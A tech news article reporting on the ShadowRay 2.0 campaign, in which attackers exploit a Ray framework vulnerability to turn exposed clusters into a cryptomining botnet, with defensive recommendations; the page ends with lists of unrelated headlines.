Security
ShadowRay’s Cryptocurrency Takeover: Converting Ray Clusters into Mining Machines
ShadowRay 2.0: A Global Campaign Exploiting Ray Clusters for Crypto Mining
In a new global campaign known as ShadowRay 2.0, cybercriminals are targeting exposed Ray Clusters to convert them into a self-propagating cryptomining botnet. This malicious activity is facilitated by exploiting an old code execution flaw within the Ray open-source framework developed by Anyscale. Ray clusters, also referred to as head nodes, are used to build and scale AI and Python applications in a distributed computing ecosystem.
According to researchers at runtime security company Oligo, a threat actor named IronErn440 is utilizing AI-generated payloads to compromise vulnerable Ray infrastructure accessible through the public internet. This campaign follows a previous ShadowRay campaign exposed by Oligo between September 2023 and March 2024.
Exploiting Vulnerabilities and Payload Capabilities
The cybercriminals behind ShadowRay 2.0 are leveraging an old critical vulnerability identified as CVE-2023-48022 to infiltrate Ray clusters. Despite the security issue not being addressed, the number of vulnerable Ray servers accessible on the internet has significantly increased.
Oligo researchers have observed two attack waves, one utilizing GitLab for payload delivery and another targeting GitHub. The payloads used in these attacks are generated with the assistance of large language models, as evidenced by the code structure and error handling patterns.
The malicious payloads submitted through Ray’s Jobs API execute multi-stage Bash and Python scripts, orchestrating the deployment of malware across all nodes in the cluster. The crypto-mining module, which mines for Monero, is AI-generated and designed to evade detection by utilizing only a portion of the available processing power.
Defense Strategies and Recommendations
Given the absence of a fix for CVE-2023-48022, Ray users are advised to follow best practices recommended by Anyscale when deploying their clusters. These practices include securing the clusters from unauthorized access using firewall rules and security group policies.
Anyscale has also emphasized the importance of deploying Ray in a secure, trusted environment. Additional security measures such as implementing authorization on the Ray Dashboard port and continuous monitoring of AI clusters for anomalous activity are recommended by Oligo to defend against ShadowRay 2.0.
Looking to enhance your team’s security protocols? Download our cheat sheet for expert tips on secrets management.
Revolutionizing the Road: Apple’s CarPlay Welcomes Third-Party Chatbots
Barclays Banking on AI: Driving Efficiency and Profitability
Greening the Economy: Enhancing Health and Sustainability through Digital Innovation
Mercedes-AMG GLC 53 Unleashed: Powering Up with a 6-Cylinder Engine and Drift Mode
Ultimate Power in Your Hands: The $4,299 Ayaneo Windows Handheld
Monster Hunter Wilds Anniversary: A Collab with its Kid-Friendly Cousin and Exciting DLC Updates
Power Up with the Ugreen Zapix 200W: A Comprehensive 8-Port Charging Station Review
Unleashing the Potential of AI: The Brain as the Foundation, not the Limit
Microsoft Unveils Windows 11 26H1: Compatibility with Select and Future CPUs
EU Takes Action Against Instagram and Facebook for Violating Illegal Content Rules
Warning: Facebook Creators Face Monetization Loss for Stealing and Reposting Videos
Facebook Compliance: ICE-tracking Page Removed After US Government Intervention
InstaDub: Meta’s AI Translation Tool for Instagram Videos
Facebook’s New Look: A Blend of Instagram’s Style
Facebook and Instagram to Reduce Personalized Ads for European Users
Reclaim Your Account: Facebook and Instagram Launch New Hub for Account Recovery
Meta discontinues Messenger apps for Windows and macOS
Breaking Updates: Meta Connect 2025 Unveils Latest Developments
POCO X4 Pro Review – $250 iPhone Destroyer?
10 Million!
17 WILDEST Inventions you won’t believe are REAL.
Apple’s 2022 products are even CRAZIER than you think.
I tested the CHEAPEST Gadgets on the Internet.
I bought the THINNEST Tech in the world.
The Samsung Smartphone Scandal: Explained
14 Products that give you REAL SUPERPOWERS.
I tested Viral TikTok Life Hacks – are they a SCAM!?
-
Facebook4 months agoEU Takes Action Against Instagram and Facebook for Violating Illegal Content Rules
-
Facebook4 months agoWarning: Facebook Creators Face Monetization Loss for Stealing and Reposting Videos
-
Facebook4 months agoFacebook Compliance: ICE-tracking Page Removed After US Government Intervention
-
Facebook4 months agoInstaDub: Meta’s AI Translation Tool for Instagram Videos
-
Facebook2 months agoFacebook’s New Look: A Blend of Instagram’s Style
-
Facebook2 months agoFacebook and Instagram to Reduce Personalized Ads for European Users
-
Facebook2 months agoReclaim Your Account: Facebook and Instagram Launch New Hub for Account Recovery
-
Apple4 months agoMeta discontinues Messenger apps for Windows and macOS
